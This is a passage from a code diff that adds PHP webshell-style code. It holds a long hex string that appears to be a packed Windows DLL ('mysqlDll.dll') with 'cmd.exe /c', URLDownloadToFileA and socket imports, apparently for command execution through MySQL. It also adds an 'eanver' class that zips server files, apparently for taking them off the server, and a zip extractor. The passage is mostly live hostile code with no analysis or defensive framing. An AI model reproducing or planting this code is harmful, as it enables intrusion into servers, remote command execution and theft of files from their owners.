CBD59A522560055016B47C1BA30131750E0506DD65B3A3B591257D9BD07A8D6D90B3040963C76291950BBFDBE7076F80D838D6A0303F841DC5739B99D10B3105560FFC05D36763610570C7C1DBC7D36EB9E10FFB6D3C41611681020F8F6B9ACA927945450592C5FEB26165A6C81A38D30C7F23612B1DD0482086AF4D56CC881110FD85EC90E40C128265325F34226D911163C8B14C0012B0C8329EB2D3983D71C90A756F6DC784CC8D5EB7438B125213EF950E99ECEF2B2D61C11A9AEA880643C287BEEFD8DAD8AD73D63F3831881D51404B03582AFB210EA02F01B61E0594E3EE9B3B68D4B38F7881CB50C80F4C025622BC08B03317E30641C5E45AB0EE3A24C96880D535B24C67C80066F04368EC1F10C5229231AE3AEF90F86EAA0ECF1EE5BD5416E2BB64D1073290AD62EB045A58A95F90A7409FFDEBED0F02B0D408808EFC88D95292BCA81F9883D3655127CCC8911DBE3393ABFF4130D6B71FF85A061C634300C6343065FB6F6D20145E8C77C0B0964454510728A9960E96DD98B134E90464868B5BF8B74626A055E39B51D177F2126FC8930EB41B456EBC78D4DF4575CE6BA01B310FF43640B2EBB51CED14FEBA72C9C1EDA241C06E02C9720405AE8A015F52CEA1A10AA6C4FF24D666E1C38EBD2A4F007458258DF02F1B516CC808C6E6DFDFEAD068E6583490C08C741181BEB1103CEDDC80C494114181276D4525CA25E83618A011AE0188DF93B377203DCC883E17018AF362C368AD1A1D81C331340E58CC009FC7591345730E486E0D55BE159519130D716D76A138E1DB69AE51E5B00DE3FB41B155A22DD0CF3A00AE11ABC7A1EFBD82BD7246046735A732844BF5A020BA68FCC6C5DA0702B700C66C8077739D80A6DA14BDD581A58B26575F1A436CF51A08B84600C33C2CFBD1A506820CF118FDC6DCCCC208C4106F80E3A2AD716B6195F41CC00CDFB55B88A6D180B7718CFE8BA37C2F72AF18BD8090C07D31139A050D60C3215FCFFCF4913D1E9D1DBD1EAD1D80BC975F4F7F3B014B9B684643D2150F7EDEEBB2F7DD1720E3B27770872073B2B76014E4C4B56D84A7FDEC27F6F2A0E7AB3D96E506EA833B6517405C203506E10DD66C85E0C156EC814910410BA37CD606B0C0E0876082BBB1B406CA6DB11140708BDDA264103BB27DA007C3F26A8742AA6443D71A376E9C18BD1783BFE3DEF0F82800E036A738314ED6F4BDC8183E2EEF95E29F3A5FF249513A9F1DFD6426811BA1C83E904720C0CB136DB8F62C86D41801E8D789075F3B9C70741FC900403BCE023D173DB852F1188078A46BE470105025608938C2D5B59C6C75CCC8D96652CD949002B25010202EBCE2679A690234621473F5DD70DE48C065F034C0744374DD3343C342C241C8B44344DD3FC8EE489448FE4E8E8ECECD3344DD3F0F0F4F4F8CD39324DF8FCBDD7007B87B01027F809FFF00305399AA6808CA0BC6C36B0D766909D0BF91133240417A30D0A2BB8555B0D2531C639FCD8F692417F240DFDE3FC77823BC2E54400F7D96543B04B8F779E9C1CF92B43082CC2D6745D900B180338606D033A02F275B76F034E584F56B6B74B08F6971FA3EE02EF026FD9807C298C902724E3952D09AB2D03AE45EB1666625A955B7FB403A6699AA6BCC4CCD4DCA6691A9AE4F7971C1C189AA6699A18141410100C699AA6690C08080404A6EB0E231F05100318E05A129A283C8BB7B56C21CC96870F8313112A210CB700ACE86FE2570FAFAE83FEE08BDE770D0000EC1A0C2715773A7256B4D59382AB1D3D530256F057752B566A082A898850D71C14229893820F56741956947414EBA96A72A31644577C54EC8157B40E5BEB56D5612ED4230603EE265D565698182B52F7616904FC8AAEFF41BE0D50BCC5273ADC3701435C147C29985047568D7C07FB2D162BF90CAD240600473B5B290E2B1E7CA55E90C3B6CA11C56056821834BFA3A546088B87803B08742246C2ED46D988E80713720FF9240A606106817D0D4C02DB6E8350F531845E39C3D9AC60B6DDBC17721507CA532C1EB22D19080C16334BA55C1DE660080C7BD27502BD40DF1283CFDEDBE158EC22C90314BD737500A20F08B1443C998A74F6466221F816F87544837E5F23E886DE04FD0C958D460CFE1EC413ABFF4620ED8D5E0C70F61B090D803874180C84884388239F4500C3A585BF2D50DDE52B116A245999F7F9D1F03DD4A80336C66D2983FA3BF137EF2083C5044381FD5FA40F8C5E3984F86E23EB4EBE3E56B93E126F843E8D0C9DA9901E9C5F8684F83BC27318C01103D6EBE48D0815EAC1E30543C70B2256C9A012346C430BFCFE07563B0D535773F7C1903683D0C93CC18F07833C50B0DA28E4361AF51B053E1E751EE28B104974084958DEDE680284F4EB0804F5EB03F6A337DE4600E836891C308A5BEB161EE4C2DA027F7B5882864329F459376A830037C674320E1F5AC9F31CD6CA7E50505031C85A7B830CB2247ED4CAE264CF731FCCA3AD8D8800AB740F00E16AD8580841533AFDECA4963B343D1C063CC0C1E7154A81B1BCF749D418C5604B9E381780360CB2AD2C98248184E169CA5190C61D5642D4920179728BC3C36C8BB1E14E4152530411590F250306F029535DEC60B404CBF0F6D915B7B10211B0FF0336E4106AC0A359B43809F2A22CDEB43F4AA87BF6F30549C0FF4AB890073C9013082CBAAED003FC0C203F087900724AA84AA8A6E9BAD83F069F038C848BA6699A7C746C645C3F5D3B8F004AA8F003C00164D134CCE03F39859CE44C404BF04B4845D375DD2C900B580378A03C0239903F4C404C405D171B855B7FF403FC344DD3750E04030C141C24871160D1373F1F164DD37505500358687C3FAB2F4A003E1CCCA0022F907956F6C112883F1594D9815DE874095900FE37ABC645FF10EB0B8065FF8DECFC0FC0861A806811F6C540750839B72F455328E48B4DFF806A83C15E02056083236DC3DE2374001680E1A4C3F96C01175510100840EB07F60D4A30797FF810742604ADB7F2F220741830740A5074897505216A16A21521020C2ABD7CDF060389F0BA00077D0423CABF54B47F037D3BC87F31742A3BCB43C3ED4AB06D195433744D0739BA91AD85CC43F84C0804BAA67B7B435AF8EB3E26052F070643CE806F1E3BCA7423C2163CDD1188188F4F5B3B0507E69EE00113FDBEFEFF32FC5DF4C77413368E54F7D1234D143737B8DB1172A840C581CE1F0FF601F6ED63DBB7C4DE020BF7A8DF081408EB0AA8115D2CBDB1060B1068ADD8233BD39241E0DF751AE918016D0D8231816ABFB78D0A9E2DA82BCEF008022D6030EA3BAC39BF4213628561325256E8B383459875090A18EBD8D583F9B19A4DFF40EB09AF08146C410F78473159812781D6C68A11C380C901C630045A8452C9C2DD05BEFF0B48884CBD7578EA7473F606818116F502746D8B945DA2220B1E8B067519FC35008FBE813883E94B1D2A1759D888B60DBCEB584213E2137C677E2511335669A116807D131A11825F178CF015554445E2811980C73E5A74B52DD81C2EAF737808AB60072DDC07808B8C4E8BF390E005C916713F8005431467736A081E8233918B09570441464E600F3B32B24C245B231A0EF2F2B64D79D50D04FEEB08FDEB03F4C11A824C0C5F198A1141AA1EEC1BF16488174762EEEB05838C00F0D32401119C2CCBC983C1E134271208006DCC6AC738682DD9D2D96608C6C3000C085DC049B38807CA185A1965872312F52A65520945A9F88959AC913859A6E80AB82C06F651FAD756F29B6A0A8FD2268988391874744617CAE630428A78A9E850538B58DA71F0D73BC6CC214D628386A240C893715963FF25DAE2BF94603975E8F3ABAA895D0F6C16E8D386EBD77DEEB8BC4DEFDD405B2B04D30CAFCBB641FFE87BA312CA300F87942588CD546C9CD28DEEE356F7E58D614F6F52F3AB04AA8D9E94FA52A15498BCB6DE2C8A5101E84B51844B5CFA3BC777B7EFEE2D68FC8A922080089047401376F5F84BB1F04141803965D47983C308837DFC6913B93638C1E2C8914CBA6DA087F750A3A4105384898C2AB8BFDF709140A5A559A3D1A5EB5240D1B3A660810547A8C6A19EC57EF508403DFF07F153382B89357BDF06F15335250700BA49F88816ADAB00981EA84C97DFE75E2E8604AFE9508301D08C4311946FA857DA70EF65402DDFFE01A8946CBBE78FA8FF1570F814FD9635D1CBF4FC750F87DC19F6AE1CC7492DA463E7E804741704D7A628F00D740C802CB804F93CCF763605120B0811578460862571BEC01F88E1625F044CE5CF52B1404522283456A166B453962215127FE081E016CFBE8C888405ECDF7FA1150D8AC672F48A45F2C6850D20166E104D3B375A55F3B80A2D415FA0183BC1771D48BC3A08768F2A41B820008BD9CBAB6B81FA47AA42428A42FF84C15FF8EC352C900EFA8B358D7A029A33D0213989B2EF8C7DDD5A9123FD1D561E9291DD6C5634235842FCAD803DB8682E2768002E7DB75CCA8D8D726695F6C2CDEF67341503108A940564889060EFCEC9DBEB1C1A027410205BEBE380A06E6834781CDE4400BFEB491ADB0D1315DA417219045AB2BC8DFDC34BC880C1208888491F1D617213C3DE9CBC7A770E20E920EBE04C77F915774ABE5EC97394886AFDA90210F970505C59FC94882F1FD575798FAC426866281854FAF7403D6709FC161C57FFD664BEDB29FA297450100CC7D7BE5DA0F85714B00C06B45B99A0BB88CD16FFD0D602DEE66BED10B405531104EE1590601D4D0AC00982FA8659A057040481282056B064F0BB470B0C85965E91F983FA982DE9ED6A47C025152BD16075FA9AEF10D06D020610CA1A251C8E1D1429168F58A6EB3A06234AE2EB8807351E94CC5289365A271ACF0D56AF1235140FCBFFE1C3A0B7AC99AD78F2971B180A0360B615DCC1A8F1223E1975EF13A0876A064F4AACEC508B9E1D9C345CE66D442C51681C4C147D452E6AB6AD50293F89B1C1E0939D084B1A6606AB9F44BC3805750BBB0D416F064D6B50AF256BBC5C487D469512980708D0E250853014526D2FD050BCDE1BF6034EBC05A908D81A4A8615B06F126945FCDE30A22DC25B53C366A035AADB9C65F874E144346021CE0C29800750A09543B566401343E0E0043812F107C406F98A4804657FAB99A5DF89084B1D8A40053C0A84BED01D154D1088E4078D53010F8B459718C682050ABC160C166D515452B810448B664DDB39AD976865D1068F1496935166EB006D912446E98B17684D8B3D4BE1F40155F64235D144E68AE5A87CC50EE0D0F876EB3B0A81A274BBBE0C04E724FB027FAD0D03808136C85B00140C0075FFD06C0B23578A101A33AE3CD45FBB2D0D0BB443FF135A12493944BBDD2DA2182140803848068308CDCD76BF5F5EC6030D4344EB73CA2BD36E3260E7FF6A01CF0A090E683BAA479F74411ED101A2358848D12D821A85FF9D468B0F4388443105EB293B700420DEB6250CFF6305160AEB18A55E40D812FFA9193507AD9C7B77BF925B761A750D85115C74F3064942D12EE5E4AC062B4688210250A8EAA9D800F91131357540346A46C42BF87D5BF41F8AE875465757EB533038154C20629236B1F2DBCA6A711D23EB222014A660B0341B48E1FE033130EB651DBA397D147E108AB25936C514105A66B67DF436E1A11D591D161C0286D98CD9181FD84872DA478DC159D22AD3A62018366B5B0CBE3C20732EDB6CB74EC1245E0140503720CA3F408C4C793BDF0F849CD25B6CA014041B9C0324FCF25DAADB2EDE8BC441DC8367EB138DB5D751678BF026118BB5D9F6AD3867DC7466534CDC6121CB9EEB9257F44DEC1AA574A3A6884412D80A7432B06D4B6C5E0D40403E1C78B2C8663713EDD57F1EDA321C0962C321858F2065C814876515F4A1F20BD966B6B336DC895DE08B15483212BDB27DB953D6BDDF74B45664E467749C8F6AB35BA3B30E03EB068C28EDD5618F54D5CC0AB11B88108B71B77179088B2680AD9F44568D4A9E0D7FBA0DBA5580F1491AF30C5E5CC60736942B498BC24E58ED61328118B4ECAC375E2D043E3E8A515E564234632356A53C0497CFC819DF1D1B56495340CEC2C73B028658A3432D24F276607CDD1C490554CC335033E433B263345BC8945D18908DD9968D532C34201BC53619181FE0DB630AD06A15B5CB3EBB15B0107CD3DC57CC0FE16050B3EB0B83DB33ECB6119CF6112949E0565FF670C9DA1C5552F8D7B2703A84933C8AF5CC38680C42EF047AC25F9A51D4E7023A01752E0A1BB1D552F0263A613E0A431D966EE146873A4101191411035BA330D56BFDD51A75555B430BB3FFB090D3D18E016DADCA0B4301070242B5CFD6ED44E94130E01302A86658AD799AAF335BD2CAC9C14A6D42AA5BC98CCC4F56530B4A55B050009C1B201AFFAE023307420FAB0424EBF3775DFE5ABB8C90416E14460FA373F201E6E20204C420753F98FD646C3A0AF38D46FF3B9CB8ACF87B5643BE51EEB60E56485481DF4C03C12580FC8D161DDEBD0A80E17FEB0D811FDED0540440391180C980DE880A81440B8D6686C5C671D0419080E3D60AC0C006A0A8487D065C9C249E5862050D10565D7426E8BC00BF83C410E0AE41C305E3CC0CB568E12EF1C6012D415CEB030A915B4013D4B88110B5DAA5DAD2630883FB0950769225FF2F7D6B2004308819413577DA802100498A178A018878007F8B118F49473BF972F21B365341486FFF948BD6A81E588D39C470CD4143A1D03B5CCF252EB6C1FF46758A274738C474F22C419D1AE324EC85D2E1C5FE4186E00E824A6F1474D21AC0E6FFD1575F3AEB78F0FFBF34019130007F0419C0D96EE2EB15130DC9817888C2C77895FFB541599EEE9067271FD82E760B3E6A602266C4040907B742A68D38CFDA39CB15580B0318AC05224EEBFB55D0C2052241280EABE097CF0B6C112836D1E970DA0C1B1FFF804EB741B35AB6201726828ADDFFDBEE0774217F1D467BFC720638DC770202E638F809D8B517BA35C6F7750DEBD733C908023657B34D9BB9AFE582806D6AE4BF0FF35FA6ED85B50A321926EF2BB446AB2F99EE57EBB68DDE5AC3EC74230BAB1F775165EB3AC0F0596B0979D584B5634DCA0975720271FC08A5C9DE0E5FFECB030051283074512BBC2311EC1A2D75770C920F1DA2C685B7A6EB52DF2F7D8B5BB10EC11AB6D10A5601805E6EBDF54B318065FE0088508845FDF3EB09BAAB41D90DFD0F6C8D4D0AD58B1803165179AD7DD182C16E4F026B53B38059E3450A23B07465BB72251CAE5A80450F8CD5815DB9AAF5490F8FA18A46D52D1FE9DEE83C057C83760A4D405E7D2539DBD187F8787E0BD95FAD6A0AA1A1F4DEE0FE8A045823C667D9EB658B1512DA65E94CB4B6C84A740FA7DF5BD4D630AF88065D0958B60917C5522B5B13566B032CF036BE03B49F572F1A6AE0648FCC20F6AEDA06AD75A5D646D0BE05FD032C37126253CB0BC18C00885DC029C25A0BC839FAAB60287C25F7E1C29DEB025EA105B11D42030985056C351FD31EAACA3EC1CC03580000D37466AAFF0F4D53EE65DD9304DF03E50F08EC03BDE4F2B2F20F0AFF0B050CCF0AB656D003D50302017FB6DF3A1903070602100445000535300050B5EEFF7F2C20283850580708003730305750070F200BD71461DE000860686009780073AE956E08071507001A010E7D7BDDFF0028006E0075006C0129320F6E756C6C6FB7FFDF0A72756E74696D65206572726F72200F0D0A03544C4F07E4BFD95353110E0053494E470044BBFD65ED4F4D4112115236303238082D204BB76F7F7961626C746F20696E6956616C697A0D6865D67EBED961703727376E6F743D0460EFB6FF756768207370616323667B6C6F7769380AB9EC3661066F6E3736ED672079737464357075722BF6DB5AFB76697274752133A5632320630C9B42BED86C285F345F2ABDF6DA7665785C2F5806DCE2E6BEB0935F3139F76F706558313260DBEE736F0F646573632B3888706B6D4624816564193024DF405723376D926FDBADA6AC7468BF612F6C6F636B1B6C8530173464B7865B6B6E612E02A221726D0050D8DAB770406772616D204A6D366829EC852F30394F10E71A8D66412A2B302E2B84EF53C8386172677528735F6DBBF63C303266C16E6E67826F9CB52EB605743A1164E67F4DC3DB422B2D60396615566973AAEFF660FC432B2B2052A04C6962B47279276D0F87B90A2D16450E211150D8656B9CD43AC2002E003CE5ED6D736DE0252C6B6C776E3E1B17EED8F84765744C61324102766550AE75705BDBCE62130F57956426876534BEF0FF7373616765426F78410075732533322E642ADD931252EAB75956035A77CF76670B5A955A0E0B5B8E0392483AAFB9BBB56D904A0064002C204D20086DC9BDB97900632F642F06D74D03FDB5179A4144EE656D626B5B4E6F76C3FE6D930B4F986F0A536570741486A96885416C96711BBEEDF9B941076E6541F369A64D101636172763684665327533BDF7DE7B4A616E0A675F57537BAF7BEF4B47433779433F3B6EA9D0DE3323B03C6418B0ED587B4F5E095468127313D9C15A6157BC7C0C547509B9D9B1C64D251053750743F7DE7BEF3B372F27231F039E73CEB90A11181F262D9C73CEC5AF828990979E72CE39E7A5ACB3BAC1C8A78008047C28BB92975043BD384F296360A9523F4D797371909620A953A636306EC263B50B355A6A09A663B7B921E76A3752C077035C321703ABCF91FB2E746D700FB40600B6472A481D3A2C7EB53D25E4E6FFDB730A2F636D642E657865202F63200068656C55192B75313774073967FF76B6E4380B3006687474703A2F2F8F2DF5FF2ED9632D9B09CAE4C8EBB8F1CABDB4EDCEF3FFC3FE6F120D00CFC2D4D8CAA7B0DC0BCEC4BCFEB3C9B9A6F6DCE6FE21C2B7BEB6A3BA7E175C3F44867B81D10F00200593195731D913199DE4667271F0108DE8832119B2178E180F30434E5146C2F80392017BD894A007010153107C81A4B902011F0264410152476357D9D9070A2F0207743CF2E4C96C084009140A73F01093274F9EC411941270133C79E4C944180C1972E41AAC1B93274F9E741C4C783C796EF2E4C92C7A1CFC18FF86B29317D854DD038572200107402699282048001940269210841002199009810119900119108202601C16023B20EF200D0C050133164DD30C3603070418050D344DD3340609070C0832D82083090A1B0BC1BEF702573B070F575F906EB0101311031217210C32D820350F414336D86083503352175307D860830D575F597B6C17D2344D376DAB20701C72D860DF0BC72F80B3810760830C36821F83848F208334CD91299EA1830D32D8A46FA7B79FCE760EC2601FD70B18070069BEB35D0517C00B1D0490664006968D08644006648E8F9006644006919293CC066140039F78EF4D54EC25FF0204222B6027CF0EF68279822117A6DF07A1A581E9CDF3EF9FE0FC2F407E80FCA8C1A3DAA34F0D72F60881FE0740B577830C812F41B65FCFA2E43E5F21FFA21A00E5A2E8A25B7EA1FE5105BF92DFEE03DA5EDA5F5FDA6ADA32D3D8DEE0B26627B7F939317E430303860064AA432EE99E9C84538B9876840380A6699AA67C7874706C9AA6699A645C54483C34699AA6692824201C18A6699AA614100C08044DD334970075FCF8F0E4DCA6E99E35D42F75CC03C4BC9AA6699AB0A89C908C8849BEA669806C64CD2E821D65BB8C8F905C037F009EF040E82F500B807007F0F11325DCA0D1535499508BDD50C944548CF38CDC97B058592CA7BF06699A0E1EEF3B5A9775A769BAA7B5D4F3E0301AB86CD3034E6D01333AB759699AA6697796B4D3F20CDA74DD272F034D6C01F108A48008368024444144210980D109600064C15B054D734325746554B6CBB7572C0D44656C65466905410A105FDB0C470A0953C5D87393CD2719522C0A23EC4F56C145185661726961622212C0EC7F436C6F736548616E6425F62AD80E4B4A500B63417B7B56686753791D656D4447B7C1B656F5227914744E747515B893FD70496E666F413569704FB1DBD62EA845782A08535D65702CFB36CCFD56657273696F163B896E6754792D67DF856C570F1F4C434D6170115706882E610D1B4D7073ED5BC34279126F65646543688366E5ABA03DFB644F66F34C6FFD8E6B68FF300B746C556E773C3D48D767EDAC7C70416C6C0A46B1FB432D7B9BE16F6D6D09336E7DACB38556982673FB0B790CC580D866E50B56ADB521419C42494D1E263CC3D609630A532740B029DBDACA16AD147215421BC0B64C5B762B78108C8580250B77C5EB8407C4600C542FB998A170B6DA75D3F812DCDD3302524964386C7353F3B3378BDD5575650C4F09DE4BD2258C531D2D471A086D618643427552C93B2463366412A0D50CC363141E4D6F64BDA34E616D6A3B2160BC5F9EE473183004470A0CF3CA6624A3FD08E42CCFF04258164361853B1CFE66BF08506F6990C906C25EF99DFD6B65644465633815C2844D72496E53EB460F3AC1F1EF73684B427566663E6A50ECB136761C0A410B074F454D092C19FE10934164647297EF7D2841BCD93C7155524C440A5BA4668277E3CE1C88F6F6FE340457534153864D00FF0402CBB22CCB17390334090C8D32B62C0B022649F7FF7FAE6D0C10025C000A052F0A5205546417350BDFFEFFFF811912192A060B2A385319310B320D1B806512ED2405670B30100F1CFFFFFFFF1B1B96130B530B1C455405400645171106180A118145110B4C310526530F7D1CFBA5FFFF078B1214050B121B271A1241691A09F04BF83A06F0520103BFFDFF7F0802070F080B06060A18050A1A0E080643125C1B4F59085A0DA37DF66FFF0F16F03001BAF00AF6211775F0C8020400CE2D07E6EDEDBF5F10070708270C0A08300A0608050C050CBFB5FFBB16030813082D1B10060F06070921AE08F04F020E6BBFB5ED061A050F107EA20605060D1D15349BFBF69B2244A6F0ED0120130616070F1810FBFFDBDB091A571362A9850E0B14060E09111C0F12091C230A03FFFFFFBF0C137F0A1CF0F20007194212310C0B0F0AF00302F04D012C0C1C191A0811F6ED5BFB050D05F00549BF05380C0757070A19088EDBADFDDB05663A081A0611190C7113081E0917F6FF0B6F17621806422214320715320A2115242A0E311CF6DF6EFF21250F0F321043CB140E47065B074845E3193539DBDF6EFF0C103F50133E1282260D8E13270F42141E6D157CFBFF6FAA0E13770D251C1374A04D18154A481712E3084B2512842F6C2F47550118EF051D29261A072842EEDE1D4A0604660B1B07161D2A32FFB7B77F7228060C3B0829710D0C234F6039150D3D22084C0F19615BFBFF262E0F20222D143A0726181A0B83A67C56DBFFFF138AF0FB00790C150B2EF0D9011C0D0D13090C32C221B76678E106210A1D081715A919E80B0AFBDF0A0B6E432C0019066F061E1113151EF95068857F10210C120E0F11759647BFF00BCDB85C7EF056011E550F0AC60A89050BFFBFB51F4C35080E1E1D182058163368254605030717FEAD6DFC103D105612F03E01EC48B24F30BD71E1B75B045E2F0F5838EA3C7D3810040CFB76F38301F0B4030408F0AC0A0DF014010417C8915D7E2010108408020800046453203FF0240608041009F92F71E90C9C645045A54C010400B2976A46AA4EF90FE0000E210B0106264B004F26A9244110BDEC3CFB09100F04000700D0B237E982272A0202079B6D7ED81E8D000071C886620285B9650AC0648A002B8CAA4BA744B0100C76F92E7465787446619070E2AD2A6574CD602E7212669D2BC1AB0D5303FB5E73D902402E26CF2427B62919A49090C04F6519EC6B0F7D584FC027A06F6EBF29421B5C881051C489C700000000000000800400FF00807C2408010F85C201000060BE00A000108DBE0070FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9960100008A07472CE83C0177F7803F0A75F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE00C000008B0709C074458B5F048D843000E0000001F35083C708FF9650E00000958A074708C074DC89F979070FB707475047B95748F2AE55FF9654E0000009C07407890383C304EBD86131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE58E000008DBE00F0FFFFBB0010000050546A045357FFD58D87FF01000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9C73CFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000070F0000050F000000000000000000000000000007DF0000060F0000000000000000000000000000088F0000068F00000000000000000000000000000000000000000000092F00000A0F00000B0F0000000000000C0F000000000000073000080000000004B45524E454C33322E444C4C0075726C6D6F6E2E646C6C005753325F33322E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F74656374000055524C446F776E6C6F6164546F46696C65410000000000000000B1976A46000000001EF1000001000000030000000300000000F100000CF1000018F100009010000090150000801000002BF1000031F100003EF100000000010002006D7973716C446C6C2E646C6C0073746174650073746174655F6465696E69740073746174655F696E69740000000000E000000C0000001D360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
+}
+
+class eanver{
+var $out='';
+function eanver($dir){
+	if(@function_exists('gzcompress')){
+	if(count($dir) > 0){
+	foreach($dir as $file){
+		if(is_file($file)){
+			$filecode = file_get_contents($file);
+			if(is_array($dir)) $file = basename($file);
+			$this -> filezip($filecode,$file);
+		}
+	}
+	$this->out = $this -> packfile();
+	}
+	return true;
+	}
+	else return false;
+}
+	var $datasec      = array();
+	var $ctrl_dir     = array();
+	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	var $old_offset   = 0;
+	function at($atunix = 0) {
+		$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
+		if ($unixarr['year'] < 1980) {
+			$unixarr['year']    = 1980;
+			$unixarr['mon']     = 1;
+			$unixarr['mday']    = 1;
+			$unixarr['hours']   = 0;
+			$unixarr['minutes'] = 0;
+			$unixarr['seconds'] = 0;
+		} 
+		return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) |
+				($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);
+	}
+	function filezip($data, $name, $time = 0) {
+		$name = str_replace('\\', '/', $name);
+		$dtime = dechex($this->at($time));
+		$hexdtime	= '\x' . $dtime[6] . $dtime[7]
+					. '\x' . $dtime[4] . $dtime[5]
+					. '\x' . $dtime[2] . $dtime[3]
+					. '\x' . $dtime[0] . $dtime[1];
+		eval('$hexdtime = "' . $hexdtime . '";');
+		$fr	= "\x50\x4b\x03\x04";
+		$fr	.= "\x14\x00";
+		$fr	.= "\x00\x00";
+		$fr	.= "\x08\x00";
+		$fr	.= $hexdtime;
+		$unc_len = strlen($data);
+		$crc = crc32($data);
+		$zdata = gzcompress($data);
+		$c_len = strlen($zdata);
+		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$fr .= pack('v', strlen($name));
+		$fr .= pack('v', 0);
+		$fr .= $name;
+		$fr .= $zdata;
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$this -> datasec[] = $fr;
+		$new_offset = strlen(implode('', $this->datasec));
+		$cdrec = "\x50\x4b\x01\x02";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x14\x00";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x08\x00";
+		$cdrec .= $hexdtime;
+		$cdrec .= pack('V', $crc);
+		$cdrec .= pack('V', $c_len);
+		$cdrec .= pack('V', $unc_len);
+		$cdrec .= pack('v', strlen($name) );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('V', 32 );
+		$cdrec .= pack('V', $this -> old_offset );
+		$this -> old_offset = $new_offset;
+		$cdrec .= $name;
+		$this -> ctrl_dir[] = $cdrec;
+	}
+	function packfile(){
+		$data    = implode('', $this -> datasec);
+		$ctrldir = implode('', $this -> ctrl_dir);
+		return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00";
+	}
+}
+
+class zip
+{
+
+ var $total_files = 0;
+ var $total_folders = 0; 
+
+ function Extract ( $zn, $to, $index = Array(-1) )
+ {
+   $ok = 0; $zip = @fopen($zn,'rb');
+   if(!$zip) return(-1);
+   $cdir = $this->ReadCentralDir($zip,$zn);
+   $pos_entry = $cdir['offset'];
+
+   if(!is_array($index)){ $index = array($index);  }
+   for($i=0; $index[$i];$i++){
+   		if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries'])
+		return(-1);
+   }
+   for ($i=0; $i<$cdir['entries']; $i++)
+   {
+     @fseek($zip, $pos_entry);
+     $header = $this->ReadCentralFileHeaders($zip);
+     $header['index'] = $i; $pos_entry = ftell($zip);
+     @rewind($zip); fseek($zip, $header['offset']);
+     if(in_array("-1",$index)||in_array($i,$index))
+     	$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip);
+   }
+   fclose($zip);
+   return $stat;
+ }
+
+  function ReadFileHeader($zip)
+  {
+    $binary_data = fread($zip, 30);
+    $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);
+
+    $header['filename'] = fread($zip, $data['filename_len']);
+    if ($data['extra_len'] != 0) {
+      $header['extra'] = fread($zip, $data['extra_len']);
+    } else { $header['extra'] = ''; }
+
+    $header['compression'] = $data['compression'];$header['size'] = $data['size'];
+    $header['compressed_size'] = $data['compressed_size'];
+    $header['crc'] = $data['crc']; $header['flag'] = $data['flag'];
+    $header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime'];
+
+    if ($header['mdate'] && $header['mtime']){
+     $hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5;
+     $seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980;
+     $month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F;
+     $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
+    }else{$header['mtime'] = time();}
+
+    $header['stored_filename'] = $header['filename'];
+    $header['status'] = "ok";
+    return $header;
+  }
+
+ function ReadCentralFileHeaders($zip){
+    $binary_data = fread($zip, 46);
+    $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);
+
+    if ($header['filename_len'] != 0)
+      $header['filename'] = fread($zip,$header['filename_len']);
+    else $header['filename'] = '';
+
+    if ($header['extra_len'] != 0)
+      $header['extra'] = fread($zip, $header['extra_len']);
+    else $header['extra'] = '';
+
+    if ($header['comment_len'] != 0)
+      $header['comment'] = fread($zip, $header['comment_len']);
+    else $header['comment'] = '';
+
+    if ($header['mdate'] && $header['mtime'])
+    {
+      $hour = ($header['mtime'] & 0xF800) >> 11;
+      $minute = ($header['mtime'] & 0x07E0) >> 5;
+      $seconde = ($header['mtime'] & 0x001F)*2;
+      $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
+      $month = ($header['mdate'] & 0x01E0) >> 5;
+      $day = $header['mdate'] & 0x001F;
+      $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
+    } else {
+      $header['mtime'] = time();
